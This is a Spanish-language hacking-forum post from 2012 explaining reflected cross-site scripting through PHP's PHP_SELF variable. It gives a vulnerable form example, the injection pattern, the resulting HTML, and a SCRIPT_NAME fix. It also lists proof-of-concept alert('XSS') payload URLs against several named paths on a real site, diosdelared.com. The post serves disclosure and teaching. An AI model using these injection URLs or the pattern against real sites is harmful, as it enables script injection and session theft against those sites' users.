comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

XSS PHP_SELF [P0C DDLR]

  • 0 Respuestas
  • 2284 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado MaztoR

  • *
  • Underc0der
  • Mensajes: 56
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • MaztoR [IN]-Security
    • Email
  • Skype: Maztor-
« en: Julio 07, 2012, 03:38:59 am »
Bueno mi compañero "DEDALO" "SEGURIDADBLANCA" me comento al DM de TT sobre unos XSS en DDLR, al ver estos noté que eran los mismos que yo habia encontrado en otras rutas, analizando muy bien su estructura se pudo decir.. es XSS en PHP_SELF.

Hablemos un poco de PHP_SELF.
Es una de las variables predefinidas de PHP ya OBSOLETA

El nombre de archivo del script ejecutándose actualmente, relativo a la raíz de documentos. Por ejemplo, $_SERVER['PHP_SELF'] en un script en la dirección No tienes permisos para ver links. Registrate o Entra con tu cuenta sería /test.php/foo.bar. La constante __FILE__ contiene la ruta completa y nombre del archivo actual (es decir, incluido).

Si PHP está siendo ejecutado como un procesador de línea de comandos, esta variable contiene el nombre del script a partir de PHP 4.3.0.

No tienes permisos para ver links. Registrate o Entra con tu cuenta

Esta variable es muy usada.. y muy insegura, comunmente utilizada para apuntar los formularios hacia la misma página.

=====================
Ejemplo:
=====================
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta

       <form action="<?=$PHP_SELF?>">
       <input type="hidden" name="submitted" value="1" />
       <input type="submit" value="Submit!" />
      </form>
     </body>
    </html>


===================
Explotacion
===================


Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
    /usandophpself.php/">[JS MALICIOUS CODE]

=================
Resultado
=================

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
    <form action="/raiz/usandophpself.php/"><script>alert('XSS PHP_SELF')</script><foo">
       <input type="hidden" name="submitted" value="1" />
       <input type="submit" value="Submit!" />
      </form>
     </body>
    </html>

========================
Posible Fix
========================

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
    $_SERVER['SCRIPT_NAME']

    Hace Referencia tambien a: $_SERVER['PHP_SELF']


========================================

Archivos [RUTAS] Vulnerables P0C
========================================
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
        www.diosdelared.com/home/register.php/"><script>alert('XSS');</script>
        www.diosdelared.com/home/login.php/"><script>alert('XSS');</script>
        www.diosdelared.com/foro/index.php/"><script>alert('XSS');</script>
        www.diosdelared.com/home/index.php/"><script>alert('XSS');</script>
        www.diosdelared.com/blogs/admin.php/"><script>alert('XSS');</script>
        www.diosdelared.com/torneos.php/"><script>alert('XSS');</script>
        www.diosdelared.com/ayuda.php/"><script>alert('XSS');</script>

================================================
Creditos 3 Dedalo - 4 MaztoR
================================================

-------------------------------------
| Twitter: @Mazt0r                
| Site: No tienes permisos para ver links. Registrate o Entra con tu cuenta        
| Skype: Maztor-                    
-------------------------------------

 

¿Te gustó el post? COMPARTILO!